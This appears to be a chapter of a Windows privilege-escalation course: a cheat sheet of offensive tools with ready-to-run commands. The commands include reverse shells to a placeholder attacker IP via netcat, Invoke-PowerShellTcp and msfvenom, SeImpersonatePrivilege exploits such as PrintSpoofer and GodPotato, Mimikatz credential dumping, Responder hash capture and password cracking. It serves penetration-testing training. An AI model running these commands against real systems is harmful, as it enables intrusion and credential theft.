16 - Useful Tools
Topics
Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass
Why Do We Use Tools?
In the field of cybersecurity, tools play a crucial role in automating repetitive, complex, or otherwise resource-intensive tasks. They help professionals save time and effort, which are often limited during assessments or incidents. A good tool should:
Clearly define its purpose and scope.
Be simple to use relative to its functionality.
Integrate seamlessly into automation workflows.
Provide concise and clear output.
Remain minimalistic, avoiding unnecessary features.
Be well-documented and, if possible, modifiable for specific needs.
Why Mindset Matters
While tools are powerful, understanding the underlying concepts they automate remains essential. This knowledge ensures that you can:
Customize tools to your needs.
Develop solutions in environments where tools are unavailable.
Mitigate tool-related detection by defenders during offensive operations.
The best tool is always a well-trained mind.
Useful Tools (Windows)
Certutil
Built-in Windows utility often used for certificate management. It can also download files:
certutil -urlcache -split -f <URL> <OUTPUT-FILE>
certutil -urlcache -split -f https://example.com/file.txt file.txt
Invoke-WebRequest (iwr)
PowerShell cmdlet to download files:
iwr -uri <URL> -OutFile <OUTPUT-FILE>
iwr -uri https://example.com/file.txt -OutFile file.txt
Netcat (nc)
A versatile networking tool for creating reverse shells, listening ports, and file transfers. Example for reverse shell:
iwr -uri https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe -Outfile netcat64.exe
nc -lvnp 4321 (listener)
.\netcat64.exe <ATTACKER-IP> 4321 -e cmd.exe (on target)
Invoke-PowerShellTcp
A PowerShell reverse shell script:
iwr -uri https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 -Outfile Invoke-PowerShellTcp.ps1
. .\Invoke-PowerShellTcp
Invoke-PowerShellTcp -Reverse -IPAddress <ATTACKER-IP> -Port <PORT>
Msfvenom
Tool for generating payloads. Example for a reverse shell:
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f exe -o malicious.exe
MinGW32
A cross-compiler for building Windows binaries from Linux. Example of building a basic program:
#include <stdio.h>
int main() { printf("Hello World!\n"); return 0; }
Compile using:
x86_64-w64-mingw32-gcc -o hello.exe hello.c
PrintSpoofer
Exploit for abusing the SeImpersonatePrivilege:
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -c "cmd.exe"
GodPotato
Similar to PrintSpoofer, used for exploiting SeImpersonatePrivilege
:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.\GodPotato-NET2.exe -cmd "cmd.exe"
WinPEAS
Windows Privilege Escalation Awesome Script:
iwr -uri https://github.com/peass-ng/PEASS-ng/releases/download/20241205-c8c0c3e5/winPEASx64.exe -Outfile winPEASx64.exe
.\winPEASx64.exe quiet
PowerUp
PowerShell script for auditing privilege escalation:
iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -Outfile PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-PrivescAudit -HTMLReport
PrivescCheck
Identifies misconfigurations leading to privilege escalation:
iwr -uri "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/release/PrivescCheck.ps1" -Outfile PrivescCheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
BeRoot
Post-exploitation script for privilege escalation checks:
iwr -uri "https://github.com/AlessandroZ/BeRoot/releases/download/1.0.1/beRoot.zip" -Outfile beRoot.zip
.\beRoot.exe
Mimikatz
Advanced credential-dumping tool:
iwr -uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip" -Outfile mimikatz_trunk.zip
.\mimikatz.exe
Impacket
Python library for working with Windows protocols:
pip install impacket
impacket-smbclient <TARGET-IP>
Responder
Poisoning tool for capturing hashes:
git clone https://github.com/lgandx/Responder
sudo python3 Responder.py -I <INTERFACE>
Chisel
TCP/UDP tunneling tool for pivoting:
chisel server -p 8080 --reverse
chisel client <SERVER-IP>:8080 R:1080:127.0.0.1:80
Hashcat and John the Ripper
Tools for cracking passwords and hashes:
hashcat -m 1000 -a 0 hash.txt rockyou.txt
john --format=nt --wordlist=rockyou.txt hash.txt
CrackMapExec
Network exploitation and post-exploitation framework:
crackmapexec smb <TARGET-IP>
Disclaimer
❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗
Last updated